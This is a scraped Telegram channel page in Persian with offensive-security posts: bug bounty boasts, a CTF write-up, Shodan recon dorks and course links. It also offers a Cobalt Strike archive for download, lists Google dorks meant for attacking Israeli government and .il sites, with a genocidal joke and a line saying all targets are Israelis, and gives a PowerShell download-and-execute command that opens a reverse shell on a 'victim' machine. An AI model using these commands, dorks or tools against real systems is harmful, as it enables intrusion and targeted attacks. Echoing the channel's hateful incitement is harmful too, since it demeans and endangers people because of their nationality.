CyberSecurity – Telegram
CyberSecurity
901 subscribers
122 photos
26 videos
73 files
145 links
Welcome to dark hell

‌ ما از دانش خود برای مهندسی دنیایی امن ‌تر استفاده می‌کنیم 🔐
Download Telegram
نه به این سادگی اما خب تویه همین حالات با دستورات large language model پیاده سازی میشه🔥
👌5
باگ جدیدم تریاژ شد از پلتفرم دیوار به مبلغ 50 میلیون 🔥🩶
آسیب پذیری ترکیب IDOR و عدم برسی سطح دسترسی رویه سامانه اصلی دیوار بود.
👍6
Media is too big
VIEW IN TELEGRAM
⭕️ حل چالش مهندسی معکوس اندروید با موبایل در مسابقات #RavinCTF


تغیر شرط چک کردن activity باعث میشه کلا برنامه بره تو هوا و دستور رو برعکس اجرا کنه!

بعدش هم به مبحث insecure log پرداخته شده که فلگ به راحتی لاگ میشه

Android SecureNote-1 چالش

#Reverse #CTF #Android
سلاممم شبتون بخیر
https://youtube.com/playlist?list=PLVpSgjgZgefVsF2iVDdMsiD0qFL3RkfAZ&si=tVuTa6UT8Aq1JG4m

دوره HTTP آماده شد❤️😍

فیدبک یادتون نره حتی اگه مشکلی بود بگین تا ویدیوهای بعدی با کیفت باشن
👍7
Media is too big
VIEW IN TELEGRAM
💣🔐 شکستن BitLocker یا عبور از سد امنیتی رمزنگاری دیسک در ویندوز!

در این ویدیو به نحوه حمله از طریق سخت افزار و عبور از مکانیزم امنیتی BitLocker بر پایه TPM(Trusted Platform Module) را در مدت زمانی بسیار کوتاه مشاهده می‌کنیم.

نکته اول: این روش امن سازی امروزه بسیار پر کاربرد و شایع است و تقریبا اکثر کسب و کارها و افراد از آن بهره می برند.
نکته دوم: در صورتی که اطلاعات مهمی دارید و همزمان خطر سرقت کامپیوتر یا دسترسی فیزیکی به آن نیز دغدغه شماست، لطفا بجز BitLocker به روش‌های دیگر OTF Encryption نیز فکر کنید.
تارگتا همه اسرائیلین
👍6👎3
خب بالاخره به رنک 1 باگ بانتی ستون رسیدم😅

https://bugbounty.sotoon.ir/app/leaderboard/list
6👍3
سلام بچه ها
میخوام دوره جدید رکورد کنم بین دو موضوع موندم

زیر کامنتا اعلام کنید بهم

1. Api Security
2. Recon tools
Cobalt_Strike_v4.9.1.7z
68.9 MB
CS491
cobalt strike
یکی از ابزار های بشدت قدرتمند در حوزه رد تیم که نیازه🔥
😈3👍1
shodan dorks for recon :

1. ssl.cert.subject.CN:"*.target.com" http.noscript:"index of/"

2. ssl.cert.subject.CN:"*.target.com" http.noscript:"gitlab"

3. ssl.cert.subject.CN:"*. target.com" http.noscript:"gitlab"

4. ssl.cert.subject.CN:"*.target.com" "230 login successful" port:"21"

5. ssl.cert.subject.CN:"*. target.com" +200 http.noscript:"Admin"
5👌1
چی میشه اگر یه برنامه نویس فولدر .git رو داخل هاست اپلود کنه؟

در ویدیو زیر به برسی دایرکتوری .git و نحوه اکسپلویت کردن این دایرکتوری میپردازیم.

در بحث بالا بردن اهمیت این آسیب پذیری در باگ بانتی
و یا برسی کردنشیال ها یا … در عملیات های رد تیم


https://youtu.be/nQp0Me4tTEU?si=C4fG3F0xF8bfFde8
👌7
گوگل دورک هایی برای حمله به زیر ساخت های سگیونیستی و تولید صابون:
میتونین خودتون تغیراتی ایجاد کنید👍

site:*.gov.il ext:php
site:*.il "admin"
site:*.il "dashboard"
site:*.il inurl:?id=
site:*.il inurl:?cat=
site:*.il ext:zip
site:*.il inurl:aspx?
site:*.il inurl:?id=

site:*.il inurl:"index.php?id=" OR inurl:"news.php?id=" OR inurl:"gallery.php?id=" OR inurl:"product.php?id=" OR inurl:"post.php?id=" OR inurl:"static"

site:*.il inurl:news.php?id=
site:*.il "index of /"
👍6👎2
با این کد پاورشل میتونید Reverse shell از سیستم های ویندوزی بگیرید:

https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1

کافیه این ماژول داخل پاورشل قربانی وارد بشه تا دسترسی شما از کامپیوتر طرف برقرار بشه.

مراحل اجرا:‌‌
1. بجای IP,PORT داخل کد, آدرس و پورت سرور خودتون رو قرار بدید.

2. حالا با استفاده از یک پیلود مثل

iex((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1'))
میتونید ماژول رو از سرور دریافت و در سیستم قربانی اجرا کنید.

دسترسی برقرار میشود!💣

نکته: این پست ها صرفا جهت استفاده در موارد آموزشی میباشد👍
👍6👎2😈1